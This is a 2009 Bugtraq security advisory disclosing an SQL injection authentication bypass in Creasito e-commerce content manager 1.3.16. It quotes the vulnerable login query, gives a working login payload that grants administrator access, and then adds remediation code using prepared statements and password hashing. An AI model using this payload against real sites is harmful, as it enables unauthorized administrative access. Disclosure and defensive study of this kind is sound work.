Creasito e-commerce content manager Authentication Bypass
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: Creasito e-commerce content manager Authentication Bypass
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Mon, 20 Apr 2009 17:08:20 +0200
******* Salvatore "drosophila" Fresta *******
[+] Application: creasito e-commerce content manager
[+] Version: 1.3.16
[+] Website: http://creasito.bloghosteria.com
[+] Bugs: [A] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 20 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
This CMS is entirely vulnerable to SQL injection.
I decided to post only the authentication bypass
flaw.
- [A] Authentication Bypass
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin/checkuser.php, checkuser.php
An SQL injection in the login handler lets an
unauthenticated user bypass the authentication check:
the username is read from $_POST and concatenated
unescaped into the query below. With magic_quotes_gpc
on, the single quote in the payload would be escaped
with a backslash and the injection would fail, which is
why that setting is listed as a requisite (magic quotes
were removed in PHP 5.4, so on later PHP versions the
requisite is always met). The following is the
vulnerable code:
...
$username = $_POST['username'];
...
$sql = mysql_query("SELECT * FROM amministratore WHERE
username='$username' AND password='$password' AND activated='1'");
...
*************************************************
[+] Code
- [A] Authentication Bypass
Username: -1' OR '1'='1'#
Password: foo
With this username the query becomes
SELECT * FROM amministratore WHERE username='-1' OR '1'='1'#' AND password='foo' AND activated='1'
MySQL treats everything after # as a comment, so the
password and activated conditions are discarded, the
WHERE clause is true for every row, and the script logs
the attacker in as whichever administrator row is
returned first. The password value is irrelevant.
*************************************************
[+] Fix
No fix available from the vendor at the time of
publication. The correct fix is to stop building the
query from request data: use a prepared statement with
bound parameters (mysqli or PDO) and verify a password
hash in PHP instead of comparing a plaintext password
column in SQL.
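As an added illustration, not code from the Creasito project or from the original advisory: the vulnerable check rewritten with a mysqli prepared statement and a hashed password. The $mysqli connection, the assumption that amministratore.password holds a password_hash() digest, and the checkUser function name are all assumptions; the advisory elides where $password is assigned, so it is taken here as a plain function argument. The original mysql_* extension was removed in PHP 7.0, so the rewrite uses mysqli.

```php
<?php
// Added example, not Creasito code. Assumes $mysqli is an open mysqli
// connection (mysqlnd driver, needed for get_result) and that the
// amministratore.password column holds a password_hash() digest; the
// advisory shows a plaintext comparison, so the schema would need migrating.

function checkUser(mysqli $mysqli, string $username, string $password): ?array
{
    // The username reaches the query only as a bound parameter, so the
    // advisory's payload  -1' OR '1'='1'#  is compared literally against
    // the column (quote, hash and all) and matches no row. The activated='1'
    // condition stays in the query; the password check moves into PHP.
    $stmt = $mysqli->prepare(
        "SELECT id, username, password FROM amministratore "
        . "WHERE username = ? AND activated = '1'"
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // password_verify() handles the salted digest produced by password_hash()
    // and runs a constant-time comparison. Fail closed on no row or mismatch.
    if (!$row || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

// Usage in the login script (the advisory's payload no longer logs anyone in):
// $admin = checkUser($mysqli, $_POST['username'] ?? '', $_POST['password'] ?? '');
// if ($admin === null) {
//     http_response_code(401);
//     exit('Login failed');
// }
```

Because the username is bound rather than interpolated, the # comment trick and the OR '1'='1' clause never reach the SQL parser, and because the password is verified in PHP there is no password='...' fragment left to comment out. If existing rows still store plaintext or unsalted MD5 passwords, rehash them with password_hash() at the user's next successful login before switching the comparison to password_verify().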
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351